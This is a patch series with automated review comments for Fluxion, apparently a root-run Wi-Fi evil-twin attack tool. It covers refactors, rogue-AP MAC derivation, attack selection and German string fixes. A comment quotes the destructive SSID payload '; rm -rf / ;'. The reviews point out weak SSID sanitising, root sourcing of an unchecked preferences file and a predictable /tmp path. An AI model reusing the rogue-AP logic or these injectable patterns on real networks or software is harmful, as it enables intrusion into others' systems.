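Review bot: Both new `readarray` blocks put the awk program and the CSV path on separate lines with no trailing backslash, so inside the process substitution they are two commands: awk runs without an input file and reads standard input, and the shell then tries to execute `"$FLUXIONWorkspacePath/dump-01.csv"` as a program. End the awk line with a backslash, or keep the path on the same line, in both blocks. Building the program in double quotes is also what forces the `\$1` escapes; passing the pattern with `awk -F, -v mac="$matchMAC"` and matching `$1 ~ mac` lets the program stay in single quotes. The enclosing function starts and ends outside this hunk.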
@@ -1005,7 +1063,7 @@ function fluxion_get_target() { ) # Parse any non-ascii characters by letting bash handle them. - # Just escape all single quotes in ESSID and let bash's $'...' handle it. + # Escape all single quotes in ESSID and let bash's $'...' handle it. local sanitizedESSID=$( echo "${candidateAPInfo//\'/\\\'}" | cut -d , -f 14 ) @@ -1020,9 +1078,12 @@ function fluxion_get_target() { elif [ $power -gt $FLUXIONNoiseCeiling ]; then candidatesQuality[i]=100 else - # Bash doesn't support floating point division, so I gotta work around it... - # The function is Q = ((P - F) / (C - F)); Q - quality, P - power, F - floor, C - Ceiling. - candidatesQuality[i]=$(((${candidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10))) + # Bash doesn't support floating point division, work around it... + # Q = ((P - F) / (C - F)); Q-quality, P-power, F-floor, C-Ceiling. + candidatesQuality[i]=$( + ((${candidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / \ + (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10)) + ) fi done @@ -1030,10 +1091,14 @@ function fluxion_get_target() { local -r headerTitle="$FormatCenterLiterals\n\n" format_apply_autosize "$CRed[$CSYel ** $CClr$CRed]$CClr %-*.*s %4s %3s %3s %2s %-8.8s %18s\n" - local -r headerFields=$(printf "$FormatApplyAutosize" "ESSID" "QLTY" "PWR" "STA" "CH" "SECURITY" "BSSID") + local -r headerFields=$( + printf "$FormatApplyAutosize" \ + "ESSID" "QLTY" "PWR" "STA" "CH" "SECURITY" "BSSID" + ) format_apply_autosize "$CRed[$CSYel%03d$CClr$CRed]%b %-*.*s %3s%% %3s %3d %2s %-8.8s %18s\n" - io_query_format_fields "$headerTitle$headerFields" "$FormatApplyAutosize" \ + io_query_format_fields "$headerTitle$headerFields" \ + "$FormatApplyAutosize" \ candidatesColor[@] \ candidatesESSID[@] \ candidatesQuality[@] \ 
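Review bot: The reflowed quality formula in hunk -1020,9 is no longer an arithmetic expansion: `$(` followed by a line break and `((…))` is a command substitution that runs the arithmetic command, which prints nothing, so `candidatesQuality[i]` is assigned an empty string. `$((` has to stay contiguous; a line break inside it is allowed and needs no backslash, e.g. `candidatesQuality[i]=$(( (${candidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10) ))`. The loop this sits in starts and ends outside the hunk.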
@@ -1063,21 +1128,23 @@ function fluxion_get_target() { # network "; rm -rf / ;". If the string isn't sanitized accidentally # shit'll hit the fan and we'll have an extremly distressed user. # Replacing ' ', '/', '.', '~', '\' with '_' - FLUXIONGetTargetSSIDClean=$( + FluxionTargetSSIDClean=$( echo "$FLUXIONGetTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' ) # We'll change a single hex digit from the target AP's MAC address. # This new MAC address will be used as the rogue AP's MAC address. - local -r rogueMACHex=$(printf %02X $((0x${APTargetMAC:13:1} + 1))) - FLUXIONGetTargetRogueMAC="${FLUXIONGetTargetMAC::13}${rogueMACHex:1:1}${FLUXIONGetTargetRogueMAC:14:4}" + local -r rogueMACHex=$(printf %02X $((0x${FluxionTargetMAC:13:1} + 1))) + FluxionTargetRogueMAC="${FluxionTargetMAC::13}${rogueMACHex:1:1}${FluxionTargetMAC:14:4}" } function fluxion_target_show() { format_apply_autosize "%*s$CBlu%7s$CClr: %-32s%*s\n" local colorlessFormat="$FormatApplyAutosize" - local colorfullFormat=$(echo "$colorlessFormat" | sed -r 's/%-32s/%-32b/g') + local colorfullFormat=$( + echo "$colorlessFormat" | sed -r 's/%-32s/%-32b/g' + ) printf "$colorlessFormat" "" "ESSID" "\"${FluxionTargetSSID:-[N/A]}\" / ${FluxionTargetEncryption:-[N/A]}" "" printf "$colorlessFormat" "" "Channel" " ${FluxionTargetChannel:-[N/A]}" "" 
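Review bot: The SSID clean-up in this hunk is a deny-list: `sed -r 's/( |\/|\.|\~|\\)+/_/g'` replaces five characters and leaves `;`, quotes, `$`, backticks, `*` and control characters in place, so the comment's own example `"; rm -rf / ;"` still comes out containing `"` and `;`. An SSID is untrusted, remotely supplied data handled by a script running as root, so an allow-list is the safer shape, e.g. `printf '%s' "$FLUXIONGetTargetSSID" | tr -c 'A-Za-z0-9_-' '_'`. Also, the result is now stored in `FluxionTargetSSIDClean` but still read from `$FLUXIONGetTargetSSID`, while fluxion_target_show below uses `FluxionTargetSSID`; if the source variable was renamed elsewhere in the series, the clean value will be empty. fluxion_get_target starts outside the hunk.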
@@ -1269,13 +1336,19 @@ function fluxion_set_attack() { readarray -t attacks < <(ls -1 attacks) local descriptions - readarray -t descriptions < <(head -n 3 attacks/*/language/$FLUXIONLanguage.sh | grep -E "^# description: " | sed -E 's/# \w+: //') + readarray -t descriptions < <( + head -n 3 attacks/*/language/$FLUXIONLanguage.sh | \ + grep -E "^# description: " | sed -E 's/# \w+: //' + ) local identifiers=() local attack for attack in "${attacks[@]}"; do - local identifier="$(head -n 3 "attacks/$attack/language/$FLUXIONLanguage.sh" | grep -E "^# identifier: " | sed -E 's/# \w+: //')" + local identifier=$( + head -n 3 "attacks/$attack/language/$FLUXIONLanguage.sh" | \ + grep -E "^# identifier: " | sed -E 's/# \w+: //' + ) if [ "$identifier" ]; then identifiers+=("$identifier") else identifiers+=("$attack") fi @@ -1285,7 +1358,9 @@ function fluxion_set_attack() { identifiers+=("$FLUXIONGeneralBackOption") descriptions+=("") - io_query_format_fields "" "\t$CRed[$CSYel%d$CClr$CRed]$CClr%0.0s $CCyn%b$CClr %b\n" attacks[@] identifiers[@] descriptions[@] + io_query_format_fields "" \ + "\t$CRed[$CSYel%d$CClr$CRed]$CClr%0.0s $CCyn%b$CClr %b\n" \ + attacks[@] identifiers[@] descriptions[@] echo @@ -1422,7 +1497,7 @@ function fluxion_main() { "prep_attack" \ "run_attack" \ ) - + while true # Fluxion's runtime-loop. do fluxion_do_sequence fluxion sequence[@] done From 6661266e152ec144eb5e4c5b13bc24783a7451b3 Mon Sep 17 00:00:00 2001 From: deltax Date: Tue, 9 Jan 2018 21:08:26 +0100 Subject: [PATCH 08/45] Transform spaces to tabs - Better usage for different editors - Easier to handle --- .editorconfig | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.editorconfig b/.editorconfig index 28ee5a7..c68852e 100644 --- a/.editorconfig +++ b/.editorconfig @@ -6,7 +6,7 @@ insert_final_newline = true max_line_length=120 [*.sh] -indent_style = space +indent_style = tab indent_size = 2 charset = utf-8 trim_trailing_whitespace = true 
From efaea0af1d4207ee81c35fbc073c23bad5216b9b Mon Sep 17 00:00:00 2001 From: deltax Date: Tue, 9 Jan 2018 21:16:47 +0100 Subject: [PATCH 09/45] Fix bad grammer - Fix Minor mistakes --- language/de.sh | 48 ++++++++++++++++++++++++------------------------ 1 file changed, 24 insertions(+), 24 deletions(-) diff --git a/language/de.sh b/language/de.sh index 41030a5..660b930 100755 --- a/language/de.sh +++ b/language/de.sh 
@@ -2,26 +2,26 @@ # German # native: Deutsch -FLUXIONInterfaceQuery="Wähle deine Netzwerkkarte aus" -FLUXIONUnblockingWINotice="Entferne den Softblock von allen Netzwerkkarten..." -FLUXIONFindingExtraWINotice="Schaue nach fremden drahlosen Netzwerkkarten..." -FLUXIONRemovingExtraWINotice="Entferne freme drahtlose Netzwerkkarten..." -FLUXIONFindingWINotice="Schaue nach fremden drahlosen Netzwerkkarten..." -FLUXIONSelectedBusyWIError="Die ausgewählte Netzwerkkarte befindet sich gerade in benutzung" -FLUXIONSelectedBusyWITip="Führe \"export FLUXIONWIKillProcesses=1\" aus bevor du FLUXION nutzt." -FLUXIONGatheringWIInfoNotice="Sammeln der Daten von allen Netzwerken..." +FLUXIONInterfaceQuery="Wähle Sie ihre Netzwerkkarte aus" +FLUXIONUnblockingWINotice="Wiederherstellen von allen Netzwerkkarten..." +FLUXIONFindingExtraWINotice="Suche nach Netzwerkkarten..." +FLUXIONRemovingExtraWINotice="Entferne Netzwerkkarten..." +FLUXIONFindingWINotice="Suche nach Netzwerkkarten..." +FLUXIONSelectedBusyWIError="Die ausgewählte Netzwerkkarte befindet sich gerade in Benutzung" +FLUXIONSelectedBusyWITip="Führe \"export FLUXIONWIKillProcesses=1\" aus bevor Sie FLUXION benutzen" +FLUXIONGatheringWIInfoNotice="Sammeln von Daten, von allen Netzwerken..." FLUXIONUnknownWIDriverError="Netzwerkkartentreiber konnte nicht bestimmt werden" FLUXIONUnloadingWIDriverNotice="Warte auf Netzwerkarte \"\$wiSelected\"..." -FLUXIONLoadingWIDriverNotice="Warte auf Netzwerkarte \"\$wiSelected\"..." +FLUXIONLoadingWIDriverNotice="Warte auf Treiberantwort \"\$wiSelected\"..." FLUXIONFindingConflictingProcessesNotice="Suche nach Diensten die Probleme verursachen können..." FLUXIONKillingConflictingProcessesNotice="Beende Diensten die Probleme verursachen können..." 
FLUXIONPhysicalWIDeviceUnknownError="${CRed}Die Physische Schnittstelle konnte nicht ermittelt werden" -FLUXIONStartingWIMonitorNotice="Starte die Netzwerkkarte im Monitor Mode" +FLUXIONStartingWIMonitorNotice="Starte die Netzwerkkarte im sogenannten Monitor Mode" FLUXIONMonitorModeWIEnabledNotice="${CGrn}Monitormode konnte erfolgreich gestartet werden" FLUXIONMonitorModeWIFailedError="${CRed}Monitormode konnte nicht gestartet werden" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONStartingScannerNotice="Starte Netzwerkscanner" -FLUXIONStartingScannerTip="Wenn nach etwa 5 Sekunden Netzwerke sichbar werden, schließe Netzwerkscanner" +FLUXIONStartingScannerTip="Wenn nach etwa 30 Sekunden Netzwerke sichbar werden, schließe Netzwerkscanner" FLUXIONPreparingScannerResultsNotice="Analysieren von allen gesammelten Daten..." FLUXIONScannerFailedNotice="Netzwerkkarte ist möglichweise nicht geeignet ( Keine Netzwerke gefunden )" FLUXIONScannerDetectedNothingNotice="Keine Netzwerke konnten gefunden werden" 
@@ -30,14 +30,14 @@ FLUXIONHashFileDoesNotExistError="Hash Datei existiert nicht" FLUXIONHashInvalidError="${CRed}Fehler$CClr, falscher Hash" FLUXIONHashValidNotice="${CGrn}Erfolgreich$CClr,Hash wurde erfolgreich verifiziert" FLUXIONPathToHandshakeFileQuery="Geben sie den Pfad zum Handshake an $CClr(Beispiel: /.../dump-01.cap)" -FLUXIONAbsolutePathInfo="Geben sie den Absoluten Pfad ein" +FLUXIONAbsolutePathInfo="Geben sie den absoluten Pfad ein" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -FLUXIONScannerChannelQuery="Wähle deinen Netzwerkkanal aus" -FLUXIONScannerChannelOptionAll="Alle Netzwerkkanäle" -FLUXIONScannerChannelOptionSpecific="Spezifische Kanal(e)" +FLUXIONScannerChannelQuery="Wähle deinen Netzwerkfrequenz aus" +FLUXIONScannerChannelOptionAll="Alle Netzwerkfrequenzen" +FLUXIONScannerChannelOptionSpecific="Spezifische Frequenz(en)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -FLUXIONScannerChannelSingleTip="Einzelner Kanal" -FLUXIONScannerChannelMiltipleTip="Mehrere Kanäle" +FLUXIONScannerChannelSingleTip="Einzelne Frequenz" +FLUXIONScannerChannelMiltipleTip="Mehrere Frequenzen" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerHeader="FLUXION Scanner" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
@@ -48,15 +48,15 @@ FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}Langsame Verbindung FLUXIONHashSourceQuery="Wähle eine Methode aus um den Handshake zu erlangen" FLUXIONHashSourcePathOption="Handshake Pfad eingeben" FLUXIONHashSourceRescanOption="Handshake Ordner neu einlesen" -FLUXIONFoundHashNotice="Ein hash wurde für das Netzwerk gefunden" -FLUXIONUseFoundHashQuery="Möchten sie dieses Netzwerk nutzen" -FLUXIONHashVerificationMethodQuery="Wählen sie eine Methode um den Hash zu Verifizieren" -FLUXIONHashVerificationMethodPyritOption="Pyrit Verifizierung (${CGrn}Empfohlen$CClr)" -FLUXIONHashVerificationMethodAircrackOption="Aircrack Verfizierung (${CYel}Unglaubwürdig$CClr)" +FLUXIONFoundHashNotice="Ein Hash wurde für das Netzwerk gefunden" +FLUXIONUseFoundHashQuery="Möchten Sie dieses Netzwerk nutzen?" +FLUXIONHashVerificationMethodQuery="Wählen sie eine Methode um den Hash zu verifizieren" +FLUXIONHashVerificationMethodPyritOption="Pyrit verifizierung (${CGrn}Empfohlen$CClr)" +FLUXIONHashVerificationMethodAircrackOption="Aircrack verfizierung (${CYel}Nicht empfohlen$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONAttackQuery="Wählen Sie einen drahtlosen Angriff für den Zugangspunkt aus" FLUXIONAttackInProgressNotice="${CCyn}\$FLUXIONAttack$CClr Angriff gestartet" -FLUXIONSelectAnotherAttackOption="Wähle einen anderen Angriff" +FLUXIONSelectAnotherAttackOption="Wählen Sie einen anderen Angriff" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONGeneralBackOption="${CRed}Zurück" FLUXIONGeneralExitOption="${CRed}Ausgang" 
@@ -65,7 +65,7 @@ FLUXIONGeneralNotFoundError="Nicht gefunden" FLUXIONGeneralXTermFailureError="${CRed}Xterm Terminal konnte nicht gestartet werden" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONCleanupAndClosingNotice="Aufräumen und schließen" -FLUXIONKillingProcessNotice="Killing ${CGry}\$targetID$CClr" +FLUXIONKillingProcessNotice="Beende ${CGry}\$targetID$CClr" FLUXIONRestoringPackageManagerNotice="Restoring ${CCyn}\$PackageManagerCLT$CClr" FLUXIONDisablingMonitorNotice="Deaktivierung der Netzwerkkarte" FLUXIONDisablingExtraInterfacesNotice="Deaktivierung der Netzwerkkarte" From 0e2bb3a4bd302427f51adff70907ca05a55c8b6d Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Tue, 9 Jan 2018 14:43:40 -0600 Subject: [PATCH 10/45] Corrected loops, & if statements to follow style guide. --- fluxion | 163 ++++++++++++++++++++++++++++++-------------------------- 1 file changed, 86 insertions(+), 77 deletions(-) diff --git a/fluxion b/fluxion index 22862a1..f83c6d7 100755 --- a/fluxion +++ b/fluxion 
@@ -28,33 +28,33 @@ declare -r FLUXIONRevision=0 # ============================================================ # # ================= < Script Sanity Checks > ================= # # ============================================================ # -if [ $EUID -ne 0 ] # Super User Check - then echo -e "Aborted, please execute the script as root."; exit 1 +if [ $EUID -ne 0 ]; then # Super User Check + echo -e "Aborted, please execute the script as root."; exit 1 fi # ===================== < XTerm Checks > ===================== # # TODO: Run the checks below only if we're not using tmux. -if [ ! "${DISPLAY:-}" ] # Assure display is available. - then echo -e "Aborted, X (graphical) session unavailable."; exit 2 +if [ ! "${DISPLAY:-}" ]; then # Assure display is available. + echo -e "Aborted, X (graphical) session unavailable."; exit 2 fi -if ! hash xdpyinfo 2>/dev/null # Assure display probe possible. - then echo -e "Aborted, xdpyinfo is unavailable."; exit 3 +if ! hash xdpyinfo 2>/dev/null; then # Assure display probe. + echo -e "Aborted, xdpyinfo is unavailable."; exit 3 fi -if ! xdpyinfo &>/dev/null # Assure display info is available. - then echo -e "Aborted, xterm test session failed."; exit 3 +if ! xdpyinfo &>/dev/null; then # Assure display info available. + echo -e "Aborted, xterm test session failed."; exit 3 fi # ================ < Parameter Parser Check > ================ # getopt --test > /dev/null # Assure enhanced getopt (returns 4). -if [ $? -ne 4 ] - then echo "Aborted, enhanced getopt isn't available."; exit 4 +if [ $? -ne 4 ]; then + echo "Aborted, enhanced getopt isn't available."; exit 4 fi # =============== < Working Directory Check > ================ # -if ! mkdir -p "$FLUXIONWorkspacePath" &> /dev/null - then echo "Aborted, can't generate a workspace directory."; exit 5 +if ! 
mkdir -p "$FLUXIONWorkspacePath" &> /dev/null; then + echo "Aborted, can't generate a workspace directory."; exit 5 fi # Once sanity check is passed, we can start to load everything. @@ -105,8 +105,8 @@ while [ "$1" != "--" ]; do -r|--reloader) declare -r FLUXIONWIReloadDriver=1;; -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; -m|--multiplexer) declare -r FLUXIONTMux=1;; - -l|--language) FLUXIONLanguage=$2; shift;; - -a|--attack) FLUXIONAttack=$2; shift;; + -l|--language) FluxionLanguage=$2; shift;; + -a|--attack) FluxionAttack=$2; shift;; esac shift # Shift new parameters done 
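Review bot: The workspace check `mkdir -p "$FLUXIONWorkspacePath"` (hunk -28,33) succeeds when the directory already exists, and the path is the fixed `/tmp/fluxspace`, so a root process ends up writing into a directory or symlink that any local user could have created beforehand. Creating the workspace with `mktemp -d`, or at least refusing an existing path that is a symlink or not owned by root (`[ -L "$FLUXIONWorkspacePath" ] || [ ! -O "$FLUXIONWorkspacePath" ]`), closes that. The exit codes also overlap: both xdpyinfo checks exit 3, and this check exits 5, the same code the getopt failure uses further down.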
@@ -118,32 +118,32 @@ shift # Remove "--" to prepare for attacks to read parameters. # Load user-defined preferences if there's an executable script. # If no script exists, prepare one for the user to store config. # WARNING: Preferences file must assure no redeclared constants. -if [ -x "$FLUXIONPreferencesFile" ] - then source "$FLUXIONPreferencesFile" +if [ -x "$FLUXIONPreferencesFile" ]; then + source "$FLUXIONPreferencesFile" else echo '#!/bin/bash' > "$FLUXIONPreferencesFile" chmod u+x "$FLUXIONPreferencesFile" fi # ================ < Configurable Constants > ================ # -if [ "$FLUXIONAuto" != "1" ] # If defined, assure 1. - then declare -r FLUXIONAuto=${FLUXIONAuto:+1} +if [ "$FLUXIONAuto" != "1" ]; then # If defined, assure 1. + declare -r FLUXIONAuto=${FLUXIONAuto:+1} fi -if [ "$FLUXIONDebug" != "1" ] # If defined, assure 1. - then declare -r FLUXIONDebug=${FLUXIONDebug:+1} +if [ "$FLUXIONDebug" != "1" ]; then # If defined, assure 1. + declare -r FLUXIONDebug=${FLUXIONDebug:+1} fi -if [ "$FLUXIONAirmonNG" != "1" ] # If defined, assure 1. - then declare -r FLUXIONAirmonNG=${FLUXIONAirmonNG:+1} +if [ "$FLUXIONAirmonNG" != "1" ]; then # If defined, assure 1. + declare -r FLUXIONAirmonNG=${FLUXIONAirmonNG:+1} fi -if [ "$FLUXIONWIKillProcesses" != "1" ] # If defined, assure 1. - then declare -r FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} +if [ "$FLUXIONWIKillProcesses" != "1" ]; then # If defined, assure 1. + declare -r FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} fi -if [ "$FLUXIONWIReloadDriver" != "1" ] # If defined, assure 1. - then declare -r FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} +if [ "$FLUXIONWIReloadDriver" != "1" ]; then # If defined, assure 1. + declare -r FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} fi # FLUXIONDebug [Normal Mode "" / Developer Mode 1] 
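Review bot: `source "$FLUXIONPreferencesFile"` runs as root whenever the file is executable, with no check on who owns it or who else can write to it. Since the script directory may live in a user-writable checkout, gate the load on ownership as well, e.g. `if [ -x "$FLUXIONPreferencesFile" ] && [ -O "$FLUXIONPreferencesFile" ]; then`, and skip a file that is group- or world-writable. The `else` branch creates the file under the current umask; `chmod 700` after creation would make the intended permissions explicit.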
@@ -217,13 +217,14 @@ function fluxion_startup() { clear - if [ "$FLUXIONAuto" ] - then echo -e "$CBlu" - else echo -e "$CRed" + if [ "$FLUXIONAuto" ]; then + echo -e "$CBlu" + else + echo -e "$CRed" fi - for line in "${banner[@]}" - do echo "$line"; sleep 0.05 + for line in "${banner[@]}"; do + echo "$line"; sleep 0.05 done echo # Do not remove. @@ -274,8 +275,8 @@ function fluxion_shutdown() { if [ $FLUXIONDebug ]; then return 1; fi # Show the header if the subroutine has already been loaded. - if type -t fluxion_header &> /dev/null - then fluxion_header + if type -t fluxion_header &> /dev/null; then + fluxion_header fi echo -e "$CWht[$CRed-$CWht]$CRed $FLUXIONCleanupAndClosingNotice$CClr" @@ -376,12 +377,12 @@ function fluxion_conditional_bail() { } # ERROR Report only in Developer Mode -if [ $FLUXIONDebug ] +if [ $FLUXIONDebug ]; then function fluxion_error_report() { echo "Exception caught @ line #$1" } - then trap 'fluxion_error_report $LINENO' ERR + trap 'fluxion_error_report $LINENO' ERR fi function fluxion_handle_abort_attack() { @@ -544,8 +545,8 @@ function fluxion_do_sequence() { local __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[0]} while [ "$__fluxion_do_sequence__instruction" ]; do if ! fluxion_do $__fluxion_do_sequence__namespace $__fluxion_do_sequence__instruction; then - if ! fluxion_undo $__fluxion_do_sequence__namespace - then break + if ! fluxion_undo; then $__fluxion_do_sequence__namespace + break fi fi @@ -555,7 +556,9 @@ function fluxion_do_sequence() { local __fluxion_do_sequence__instructionIndex=${__fluxion_do_sequence__index["$FluxionDone"]} - if [ ! "$__fluxion_do_sequence__instructionIndex" ]; then return -4; fi + if [ ! "$__fluxion_do_sequence__instructionIndex" ]; then + return -4 + fi __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence["$__fluxion_do_sequence__instructionIndex"]} done 
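Review bot: In hunk -544,8 the style change moved the argument to the wrong side of `then`: `if ! fluxion_undo; then $__fluxion_do_sequence__namespace` calls fluxion_undo without a namespace and then executes the namespace string as a command. It should read `if ! fluxion_undo "$__fluxion_do_sequence__namespace"; then` followed by `break`. With the namespace `fluxion` that fluxion_main passes, the stray word would resolve to whatever command of that name is on PATH, if any. The loop in fluxion_do_sequence starts and ends outside this hunk.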
@@ -585,15 +588,15 @@ function fluxion_header() { # ======================= < Language > ======================= # function fluxion_unset_language() { - FLUXIONLanguage="" + FluxionLanguage="" if [ "$FLUXIONPreferencesFile" ]; then - sed -i.backup "/FLUXIONLanguage=.\+/ d" "$FLUXIONPreferencesFile" + sed -i.backup "/FluxionLanguage=.\+/ d" "$FLUXIONPreferencesFile" fi } function fluxion_set_language() { - if [ ! "$FLUXIONLanguage" ]; then + if [ ! "$FluxionLanguage" ]; then # Get all languages available. local languageCodes readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') 
@@ -609,34 +612,34 @@ function fluxion_set_language() { "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" \ languageCodes[@] languages[@] - FLUXIONLanguage=${IOQueryFormatFields[0]} + FluxionLanguage=${IOQueryFormatFields[0]} echo # Do not remove. fi # Check if all language files are present for the selected language. find -type d -name language | while read language_dir; do - if [ ! -e "$language_dir/${FLUXIONLanguage}.sh" ]; then + if [ ! -e "$language_dir/${FluxionLanguage}.sh" ]; then echo -e "$FLUXIONVLine ${CYel}Warning${CClr}, missing language file:" - echo -e "\t$language_dir/${FLUXIONLanguage}.sh" + echo -e "\t$language_dir/${FluxionLanguage}.sh" return 1 fi done if [ $? -eq 1 ]; then # If a file is missing, fall back to english. echo -e "\n\n$FLUXIONVLine Falling back to English..."; sleep 5 - FLUXIONLanguage="en" + FluxionLanguage="en" fi - source "$FLUXIONPath/language/$FLUXIONLanguage.sh" + source "$FLUXIONPath/language/$FluxionLanguage.sh" if [ "$FLUXIONPreferencesFile" ]; then if more $FLUXIONPreferencesFile | \ - grep -q "FLUXIONLanguage=.\+" &> /dev/null; then - sed -r "s/FLUXIONLanguage=.+/FLUXIONLanguage=$FLUXIONLanguage/g" \ + grep -q "FluxionLanguage=.\+" &> /dev/null; then + sed -r "s/FluxionLanguage=.+/FluxionLanguage=$FluxionLanguage/g" \ -i.backup "$FLUXIONPreferencesFile" else - echo "FLUXIONLanguage=$FLUXIONLanguage" >> "$FLUXIONPreferencesFile" + echo "FluxionLanguage=$FluxionLanguage" >> "$FLUXIONPreferencesFile" fi fi } 
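Review bot: `$FluxionLanguage` is interpolated into `source "$FLUXIONPath/language/$FluxionLanguage.sh"` and into the replacement of `sed -r "s/FluxionLanguage=.+/FluxionLanguage=$FluxionLanguage/g"` without any check on its characters. The selection menu only runs when the variable is empty (that guard opens outside this hunk), so a preset value takes this path unchanged; where such a value would come from is not visible here. The `-e` test in the `find` loop constrains it only partly. A guard ahead of that loop, `case "$FluxionLanguage" in *[!A-Za-z0-9_-]*) FluxionLanguage="en";; esac`, keeps the value to plain code characters before it selects a file to source. `more $FLUXIONPreferencesFile | grep -q …` can be `grep -q "FluxionLanguage=.\+" "$FLUXIONPreferencesFile"`, which also quotes the path.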
@@ -659,20 +662,20 @@ function fluxion_deallocate_interface() { # Release interfaces rfkill unblock all &> $FLUXIONOutputDevice # Attempt deactivating monitor mode on the interface. - if interface_set_mode $oldIdentifier managed - then return 3 + if interface_set_mode $oldIdentifier managed; then + return 3 fi fi # If interface was allocated by airmon-ng, deallocate with it. if [[ "$oldIdentifier" == *"mon"* ]]; then - if ! airmon-ng stop $oldIdentifier &> $FLUXIONOutputDevice - then return 4 + if ! airmon-ng stop $oldIdentifier &> $FLUXIONOutputDevice; then + return 4 fi else # Attempt to restore the original interface identifier. - if ! interface_reidentify $oldIdentifier $newIdentifier - then return 5 + if ! interface_reidentify $oldIdentifier $newIdentifier; then + return 5 fi fi @@ -727,8 +730,8 @@ function fluxion_allocate_interface() { # Reserve interfaces echo -e "$FLUXIONVLine "$( io_dynamic_output $FLUXIONUnloadingWIDriverNotice ) - while interface_physical "$identifier" - do sleep 1 + while interface_physical "$identifier"; do + sleep 1 done fi @@ -742,8 +745,8 @@ function fluxion_allocate_interface() { # Reserve interfaces # TODO: Make the loop below airmon-ng independent. # Maybe replace it with a list of network-managers? # WARNING: Version differences could break code below. - for program in "`airmon-ng check | awk 'NR>6{print $2}'`" - do killall "$program" &> $FLUXIONOutputDevice + for program in "`airmon-ng check | awk 'NR>6{print $2}'`"; do + killall "$program" &> $FLUXIONOutputDevice done fi @@ -755,8 +758,8 @@ function fluxion_allocate_interface() { # Reserve interfaces echo -e "$FLUXIONVLine "$( io_dynamic_output $FLUXIONLoadingWIDriverNotice ) - while ! interface_physical "$identifier" - do sleep 1 + while ! interface_physical "$identifier"; do + sleep 1 done fi 
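Review bot: In the `@@ -659,20 +662,20 @@` hunk the managed-mode branch returns 3 when `interface_set_mode $oldIdentifier managed` succeeds, whereas the two branches below it return only on failure (`if ! airmon-ng stop …`, `if ! interface_reidentify …`). That looks inverted; if so the line should be `if ! interface_set_mode "$oldIdentifier" managed; then`. As written, a successful switch back to managed mode leaves the function before the identifier is restored, and a failed switch is ignored. fluxion_deallocate_interface begins and ends outside the hunk.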
@@ -769,14 +772,15 @@ function fluxion_allocate_interface() { # Reserve interfaces if [ ! $FLUXIONAirmonNG ]; then echo -e "$FLUXIONVLine $FLUXIONReidentifyingInterface" - if [ $allocatingWirelessInterface ] - # Prevent interface-snatching by renaming the interface. - then interface_reidentify $identifier fluxwl${#FluxionInterfaces[@]} - else interface_reidentify $identifier fluxet${#FluxionInterfaces[@]} + # Prevent interface-snatching by renaming the interface. + if [ $allocatingWirelessInterface ]; then + interface_reidentify $identifier fluxwl${#FluxionInterfaces[@]} + else + interface_reidentify $identifier fluxet${#FluxionInterfaces[@]} fi - if [ $? -ne 0 ] # If reidentifying failed, abort immediately. - then return 4 + if [ $? -ne 0 ]; then # If reidentifying failed, abort immediately. + return 4 fi fi @@ -792,14 +796,19 @@ function fluxion_allocate_interface() { # Reserve interfaces # NOTICE: Conditionals below populate newIdentifier on success. if [ $FLUXIONAirmonNG ]; then - local -r newIdentifier=$(airmon-ng start $identifier | grep "monitor .* enabled" | grep -oP "wl.*mon|mon[0-9]+") + local -r newIdentifier=$( + airmon-ng start $identifier | + grep "monitor .* enabled" | + grep -oP "wl.*mon|mon[0-9]+" + ) else # Attempt activating monitor mode on the interface. - if interface_set_mode fluxwl${#FluxionInterfaces[@]} monitor + if interface_set_mode fluxwl${#FluxionInterfaces[@]} monitor; then # Register the new identifier upon consecutive successes. - then local -r newIdentifier=fluxwl${#FluxionInterfaces[@]} + local -r newIdentifier=fluxwl${#FluxionInterfaces[@]} + else # If monitor-mode switch fails, undo rename and abort. - else interface_reidentify fluxwl${#FluxionInterfaces[@]} $identifier + interface_reidentify fluxwl${#FluxionInterfaces[@]} $identifier fi fi fi 
